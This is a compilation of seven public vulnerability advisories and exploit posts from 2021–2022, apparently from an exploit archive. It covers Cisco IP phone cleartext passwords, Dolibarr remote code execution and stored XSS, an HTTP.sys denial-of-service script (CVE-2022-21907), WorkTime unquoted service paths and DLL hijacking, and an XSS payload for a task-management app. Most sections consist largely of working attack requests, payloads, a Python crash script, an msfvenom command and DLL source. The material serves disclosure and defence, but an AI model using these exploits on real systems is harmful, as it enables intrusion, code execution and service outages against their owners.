<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220113-0 ><br />=======================================================================<br /> title: Cleartext Storage of Phone Password<br /> product: Cisco IP Phone Series 78x1, 88x5, 88x1, 7832,<br /> 8832, 8821 and 3905<br /> vulnerable version: Firmware <14.1.1,<br /> Firmware <11.0(6)SR2 (device model 8821),<br /> Firmware <9.4(1)SR5 (device model 3905)<br /> fixed version: Firmware 14.1.1, 11.0(6)SR2, 9.4(1)SR5<br /> CVE number: CVE-2022-20660<br /> impact: Medium<br /> homepage: https://www.cisco.com<br /> found: 2021-04-15<br /> by: Gerhard Hechenberger (Office Vienna)<br /> Steffen Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The Cisco® IP Phone 7800 Series is a cost-effective, high-fidelity voice<br />communications portfolio designed to improve your organization’s people-centric<br />communications, while reducing your operating costs. It combines an attractive<br />new ergonomic design with “always-on” reliability and secure encrypted<br />communications. The Cisco® IP Phone 7800 Series delivers advanced IP Telephony<br />features and crystal clear wideband audio performance to deliver an<br />easy-to-use, full-featured voice communications experience on Cisco on-premises<br />and hosted infrastructure platforms and third party hosted call control."<br /><br />Source: https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7800-series/data-sheet-c78-729488.html<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends to update the devices to the newest firmware listed<br />below, where, according to the vendor, the documented issue is fixed.<br /><br />We want to thank Cisco for the very professional response and great coordination.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Cleartext Storage of Phone Password<br />The phone is storing the "phone password", which is needed to access its<br />administrative settings, in cleartext (in multiple locations) in the flash<br />memory.<br /><br />Because the password is not hashed using a suitable cryptographic hash function<br />and the storage is unencrypted, a physical attacker can easily recover the<br />password and reuse it on other phones, if they are not configured to use unique<br />administrative passwords.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Cleartext Storage of Phone Password<br />Steps to take:<br />- Configure a phone password via the TFTP XML provisioning feature.<br />- Desoldering the memory and reading its content.<br />- Analyzing the memory content. As example, the Linux command 'strings' can be<br /> used below to show the identified password in cleartext in the dumped data.<br /> ----------------------------------------<br /> $ strings nand.dump | grep phonePassword<br /> phonePassword>sectest</,x<br /> phonePassword>sectest</,x<br /> phonePassword>sectest</,x<br /> phonePassword>sectest</,x<br /> ----------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following firmware/device has been tested:<br />* Cisco IP Phone 7821: Firmware version 12.8.1-0001-455<br /><br />The vendor confirmed that the following devices are affected:<br />* Cisco IP Phone 78x1 all releases before firmware version 14.1.1<br />* Cisco IP Phone 88x5 all releases before firmware version 14.1.1<br />* Cisco IP Phone 88x1 all releases before firmware version 14.1.1<br />* Cisco IP Phone 7832 all releases before firmware version 14.1.1<br />* Cisco IP Phone 8832 all releases before firmware version 14.1.1<br />* Cisco IP Phone 8821 all releases before firmware version 11.0(6)SR2<br />* Cisco IP Phone 3905 all releases before firmware version 9.4(1)SR5<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-05-19: Contacting vendor through psirt@cisco.com. Set preliminary release<br /> date to 2021-08-07. Received PSIRT case number from Cisco employee.<br />2021-05-20: Cisco states that the finding has been shared with the development<br /> team and is currently being analyzed.<br />2021-06-30: Cisco confirms affected phone models and communicates expected<br /> dates for fixed firmware releases.<br />2021-07-07: New estimated release date was set to 2022-01-31.<br />2021-12-27: Cisco informs about the fix and the publishing date 2022-01-12 for<br /> their advisory<br />2022-01-13: Coordinated release of the security advisory.<br /><br /><br /><br />Solution:<br />---------<br />Update the firmware of the affected devices to the latest available version.<br />See the vendor's security advisory for further information:<br /><br />https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ip-phone-info-disc-fRdJfOxA<br /><br /><br />Workaround:<br />-----------<br />For immediate mitigation, ensure that phones are configured to use unique<br />administrative passwords.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Gerhard Hechenberger, Steffen Robertz / @2022<br /><br /><br /></code></pre>
<pre><code># Trovent Security Advisory 2106-01 #<br />#####################################<br /><br /><br />Authenticated remote code execution in Dolibarr ERP & CRM<br />#########################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2106-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2106-01<br />Affected product: Dolibarr ERP & CRM<br />Tested versions: Dolibarr 13.0.2<br />Vendor: Dolibarr foundation, https://www.dolibarr.org<br />Credits: Trovent Security GmbH, Nick Decker<br /><br /><br />Detailed description<br />####################<br /><br />During our security research Trovent Security discovered<br />that the Dolibarr application on default settings allows remote code execution<br />in the website builder module. When trying to use statements like "exec()",<br />"system()" or "shell_exec()" the application blocks them correctly.<br />But we were able to execute code using "``" (backticks) which is the same as<br />"shell_exec()" or "echo fread(popen('/bin/ls /', 'r'), 4096);".<br /><br />Severity: Critical<br />CVSS Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)<br />CWE ID: CWE-94<br />CVE ID: CVE-2021-33816<br /><br /><br />Proof of concept<br />################<br /><br />This is the HTTP request that creates a website with the malicious code:<br /><br />REQUEST:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />POST /website/index.php HTTP/1.1<br />Host: 10.11.9.80<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------243035796342141148842632336365<br />Content-Length: 937<br />Origin: http://10.11.9.80<br />Connection: close<br />Referer: http://10.11.9.80/website/index.php<br />Cookie: DOLSESSID_736206a821984837877b8a6a901910d2=v459clrdeu91pfc20se8s0rg4d; DOLUSERCOOKIE_boxfilter_task=all-securitytest-for-dolibarr<br />Upgrade-Insecure-Requests: 1<br /><br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="token"<br /><br />f8c257168a5ae06fd1aee2ba4c45ebf9<br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="backtopage"<br /><br /><br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="action"<br /><br />updatesource<br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="website"<br /><br />test<br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="pageid"<br /><br />1<br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="update"<br /><br />Save<br />- -----------------------------243035796342141148842632336365<br />Content-Disposition: form-data; name="PAGE_CONTENT"<br /><br /><?php<br />echo `uname -a`;<br />?><br />- -----------------------------243035796342141148842632336365--<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br /><br /><br />CODE:<br /><br />The website now displays the output of the command:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />[...]<br /><div id="websitecontentundertopmenu" class="websitecontentundertopmenu boostrap-iso"><br /><!-- style of website from file --><br /><style scoped=""><br />/* Include website CSS file */<br />/* CSS content (all pages) */<br />body.bodywebsite { margin: 0; font-family: 'Open Sans', sans-serif; }<br />.bodywebsite h1 { margin-top: 0; margin-bottom: 0; padding: 10px;}/* Include style from the HTML header of page */<br /><br /></style><br /><div id="divbodywebsite" class="bodywebsite bodywebpage-tsets"><br /><br />Linux ec9465c86e5e 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux<br /><br /></div></div><br />[...]<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />We recommend to disable the 'websites' module in Dolibarr until a fixed version<br />is deployed.<br /><br />Fixed in Dolibarr version 14.0.0, verified by Trovent.<br /><br /><br />History<br />#######<br /><br />2021-06-01: Vulnerability found<br />2021-06-02: CVE ID requested<br />2021-06-03: CVE ID received<br />2021-06-09: Vendor contacted<br />2021-06-10: Vendor reported the vulnerability as fixed<br />2021-11-08: Add information about fixed version<br />2021-11-10: Advisory published<br /></code></pre>
<pre><code>#!/usr/bin/python<br /># Author @nu11secur1ty<br /># CVE-2022-21907<br /><br />from colorama import init, Fore, Back, Style<br />init(convert=True)<br />import requests<br />import time<br /><br />print(Fore.RED +"Please input your host...\n")<br />print(Style.RESET_ALL)<br /><br />print(Fore.YELLOW)<br />host = input()<br />print(Style.RESET_ALL)<br /><br />print(Fore.BLUE +"Sending an especially malicious crafted packet, please<br />wait...")<br />print(Style.RESET_ALL)<br />time.sleep(17)<br /><br />print(Fore.GREEN)<br /># The PoC :)<br />poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':<br />'AAAAAAAAAAAAAAAAAAAAAAAA,\<br />BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\<br />RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\<br />TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\<br />OOOAOAOOOAOOAOOOAOOOAOOOAOO,\<br />****************************stupiD, *, ,',})<br /># Not necessary :)<br />print(poc,"\n")<br />print(Style.RESET_ALL)<br /><br /><br /><br /><br /><br />---- Original Advisory ----<br /><br />## Title: HTTP.sys buffer overflow denial of service<br />## Author: nu11secur1ty<br />## Date: 01.12.2022<br />## Vendor: https://docs.microsoft.com/<br />## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0<br />## CVE-2022-21907<br /><br />## Description:<br />NOTE: After a couple of hours of tests and experiments, there have<br />been no vulnerabilities when we decides to install the IIS packages on<br />these Windows platforms, it's ok, and everything is patched! Windows<br />Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by<br />default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol<br />Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service<br />and restart the system.<br />The attacker can be sending a maliciously crafted package to the<br />headers of the HTTP server of the system and this will be critical for<br />this system!<br />Not correctly sanitizing!<br />Status: CRITICAL<br /><br />## Simple test connection before debugging<br /><br />```cmd<br /> curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"<br />```<br /><br />- Output:<br /><br />```cmd<br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"<br />"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><br /><title>404 - File or directory not found.</title><br /><style type="text/css"><br /><!--<br />body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,<br />sans-serif;background:#EEEEEE;}<br />fieldset{padding:0 15px 10px 15px;}<br />h1{font-size:2.4em;margin:0;color:#FFF;}<br />h2{font-size:1.7em;margin:0;color:#CC0000;}<br />h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}<br />#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px<br />2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;<br />background-color:#555555;}<br />#content{margin:0 0 0 2%;position:relative;}<br />.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}<br />--><br /></style><br /></head><br /><body><br /><div id="header"><h1>Server Error</h1></div><br /><div id="content"><br /> <div class="content-container"><fieldset><br /> <h2>404 - File or directory not found.</h2><br /> <h3>The resource you are looking for might have been removed, had<br />its name changed, or is temporarily unavailable.</h3><br /> </fieldset></div><br /></div><br /></body><br /></html><br />```<br />## 302<br /><br />```cmd<br />curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"<br />```<br />- Output:<br /><br />```cmd<br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"<br />"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><br /><title>404 - File or directory not found.</title><br /><style type="text/css"><br /><!--<br />body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,<br />sans-serif;background:#EEEEEE;}<br />fieldset{padding:0 15px 10px 15px;}<br />h1{font-size:2.4em;margin:0;color:#FFF;}<br />h2{font-size:1.7em;margin:0;color:#CC0000;}<br />h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}<br />#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px<br />2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;<br />background-color:#555555;}<br />#content{margin:0 0 0 2%;position:relative;}<br />.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}<br />--><br /></style><br /></head><br /><body><br /><div id="header"><h1>Server Error</h1></div><br /><div id="content"><br /> <div class="content-container"><fieldset><br /> <h2>404 - File or directory not found.</h2><br /> <h3>The resource you are looking for might have been removed, had<br />its name changed, or is temporarily unavailable.</h3><br /> </fieldset></div><br /></div><br /></body><br /></html><br />```<br /><br />## 404<br /><br />```cmd<br /> curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"<br />```<br /><br />- Output:<br /><br />```cmd<br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"<br />"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><br /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><br /><title>404 - File or directory not found.</title><br /><style type="text/css"><br /><!--<br />body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,<br />sans-serif;background:#EEEEEE;}<br />fieldset{padding:0 15px 10px 15px;}<br />h1{font-size:2.4em;margin:0;color:#FFF;}<br />h2{font-size:1.7em;margin:0;color:#CC0000;}<br />h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}<br />#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px<br />2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;<br />background-color:#555555;}<br />#content{margin:0 0 0 2%;position:relative;}<br />.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}<br />--><br /></style><br /></head><br /><body><br /><div id="header"><h1>Server Error</h1></div><br /><div id="content"><br /> <div class="content-container"><fieldset><br /> <h2>404 - File or directory not found.</h2><br /> <h3>The resource you are looking for might have been removed, had<br />its name changed, or is temporarily unavailable.</h3><br /> </fieldset></div><br /></div><br /></body><br /></html><br />```<br /><br />## Bugcheck:<br /><br />```cmd<br />1: kd> kp<br />Child-SP RetAddr Call Site<br />ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx<br />ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69<br />ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0<br />ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323<br />ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63<br />ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5<br />ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51<br />ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218<br />ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7<br />ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff<br />ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa<br />ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112<br />ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55<br />ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28<br />1: kd> !analyze<br />*******************************************************************************<br />* *<br />* Bugcheck Analysis *<br />* *<br />*******************************************************************************<br /><br />KERNEL_SECURITY_CHECK_FAILURE (139)<br />A kernel component has corrupted a critical data structure. The corruption<br />could potentially allow a malicious user to gain control of this machine.<br />Arguments:<br />Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).<br />Arg2: ffffa10287993480, Address of the trap frame for the exception<br />that caused the bugcheck<br />Arg3: ffffa102879933d8, Address of the exception record for the<br />exception that caused the bugcheck<br />Arg4: 0000000000000000, Reserved<br /><br />Debugging Details:<br />------------------<br /><br />*** WARNING: Unable to verify timestamp for win32k.sys<br /><br />BUGCHECK_CODE: 139<br /><br />BUGCHECK_P1: 3<br /><br />BUGCHECK_P2: ffffa10287993480<br /><br />BUGCHECK_P3: ffffa102879933d8<br /><br />BUGCHECK_P4: 0<br /><br />PROCESS_NAME: System<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of<br />a stack-based buffer in this application. This overrun could<br />potentially allow a malicious user to gain control of this<br />application.<br /><br />SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63<br /><br />MODULE_NAME: HTTP<br /><br />IMAGE_NAME: HTTP.sys<br /><br />FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList<br /><br />FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}<br /><br />Followup: MachineOwner<br />---------<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/fbojva)<br /><br /></code></pre>
<pre><code># Trovent Security Advisory 2105-02 #<br />#####################################<br /><br /><br />Stored cross-site scripting in Dolibarr ERP & CRM<br />#################################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2105-02<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2105-02<br />Affected product: Dolibarr ERP & CRM<br />Tested versions: Dolibarr 13.0.2<br />Vendor: Dolibarr foundation, https://www.dolibarr.org<br />Credits: Trovent Security GmbH, Nick Decker<br /><br /><br />Detailed description<br />####################<br /><br />Trovent Security GmbH discovered that the Dolibarr application does not escape<br />"greater than" and "smaller than" characters if they are reflected in one of the<br />small pop-up windows with details of the object.<br />This allows an attacker to add certain custom HTML tags and attributes.<br />In our PoC we used a "body" tag in conjunction with an "onpointermove" attribute<br />to achieve constant execution of the inserted JavaScript code.<br /><br />Severity: Critical<br />CVSS Score: 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)<br />CWE ID: CWE-79<br />CVE ID: CVE-2021-33618<br /><br /><br />Proof of concept<br />################<br /><br />This is the HTTP request to change the group name:<br /><br />REQUEST:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />POST /user/group/card.php HTTP/1.1<br />Host: 10.11.9.80<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarr<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836<br />Content-Length: 950<br />Origin: http://10.11.9.80<br />Connection: close<br />Referer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6<br />Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaq<br />Upgrade-Insecure-Requests: 1<br /><br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="token"<br /><br />6585d0838337cafddc3387fcccbe9d91<br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="action"<br /><br />update<br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="backtopage"<br /><br />/user/group/card.php?id=1<br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="id"<br /><br />1<br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="nom"<br /><br />Trovent<<body onpointermove=alert(1) <>test<br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="note"<br /><br /><br />- -----------------------------329097076628264922392755475836<br />Content-Disposition: form-data; name="save"<br /><br />Save<br />- -----------------------------329097076628264922392755475836--<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br /><br /><br />CODE:<br /><br />The HTML code of the site then includes the attribute in its body tag:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br /><body id="mainbody" class="sidebar-collapse" <="" onpointermove="alert(1)" style="margin-bottom: 26px;"><br /><br /><!-- Start top horizontal --><br /><div class="side-nav-vert"><div id="id-top"><div id="tmenu_tooltip" class="tmenu"><br />[...]<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />To mitigate this vulnerability, we recommend to always escape the user input<br />regardless of where it is reflected. Additionally we recommend to blacklist all<br />HTML tags and attributes.<br /><br />Fixed in Dolibarr version 14.0.0, verified by Trovent.<br /><br /><br />History<br />#######<br /><br />2021-05-25: Vulnerability found<br />2021-05-28: CVE ID requested & received<br />2021-05-31: Vendor contacted<br />2021-06-02: Vendor reported the vulnerability as fixed<br />2021-11-08: Add information about fixed version<br />2021-11-10: Advisory published<br /></code></pre>
<pre><code># Exploit Title: WorkTime 10.20 Build Build 4967 Unquoted Service Path<br /># Discovery by: Yehia Elghaly<br /># Date: 30-12-2021<br /># Vendor Homepage: https://www.worktime.com/<br /># Software Link: https://www.worktime.com/download/worktime_corporate.exe<br /># Tested Version: 10.20 Build Build 4967<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on: Windows 7 x86 - Windows Server 2016 x64<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />WorkTime Server srvWorkTimeServer <br />C:\WorkTime\WorkTimeServerService.exe<br />Auto<br /><br />WorkTime Reports Scheduler WorkTimeReportsScheduler <br />C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe <br />Auto<br /><br />WorkTime Client Watcher Service WTCWatch <br />C:\Program Files\wtc\WTCWatch.exe WTCWatch<br />Auto<br /><br /><br />C:\Users\psycho>sc qc WorkTimeReportsScheduler<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: WorkTimeReportsScheduler<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo<br />rtsScheduler.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : WorkTime Reports Scheduler<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\psycho>sc qc WTCWatch<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: WTCWatch<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : WorkTime Client Watcher Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code># Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)<br /># Date: 09/11/2021<br /># Exploit Author: Ragavender A G<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip<br /><br /># Version: v1.0<br /><br /># Tested on: Windows 10<br /><br />*Exploit:*<br /><br />1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance<br />2. Add New department with the following value:<br /><br /> - Name: *<svg/onload=alert(1)>*<br /><br />3. Save the Department and refresh the page, which should trigger the payload.<br /><br />*PoC:*<br /><br />POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/edtms/edtms/admin/?page=maintenance<br />Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3<br /><br />id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1<br /></code></pre>
<pre><code>/* <br />Description: <br />A vulnerability exists in windows that allows other applications dynamic link libraries<br />to execute malicious code without the users consent, in the privelage context of the targeted application.<br /><br />Exploit Title: Worktime 10.20 Build 4967 DLL Hijacking Exploit <br />Date: 15/01/2022<br />Author: Yehia Elghaly <br />Vendor: https://www.worktime.com/<br />Software: https://www.worktime.com/download/worktime_corporate.exe<br />Version: Latest Worktime 10.20 Build 4967<br />Tested on: Windows 7 Pro x86 - Windows 10 x64<br />Vulnerable extensions: .htm .html<br />Vulnerable DLL: (ibxml.dll - WINSTA.dll)<br />*/<br /><br /><br />Instructions:<br /><br />1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Work Time Hacked - YME" -f dll > ibxml.dll) or compile the code<br />2. Replace ibxml.dll in Worktime directory C:\Program Files\WorkTimeAdministrator or C:\WorkTime with your newly dll<br />3. Launch WorkTimeServer.exe or WorkTimeAdministrator.exe<br />4. PoP UP MessageBox!<br /><br /><br /><br />#include <windows.h><br /><br />BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)<br />{<br /><br /> switch (fdwReason)<br /> {<br /> case DLL_PROCESS_ATTACH:<br /> dll_mll();<br /> case DLL_THREAD_ATTACH:<br /> case DLL_THREAD_DETACH:<br /> case DLL_PROCESS_DETACH:<br /> break;<br /> }<br /><br /> return TRUE;<br />}<br /><br />int dll_mll()<br />{<br /> MessageBox(0, "WorkTime Hacked!", "YME", MB_OK);<br />}<br /></code></pre>
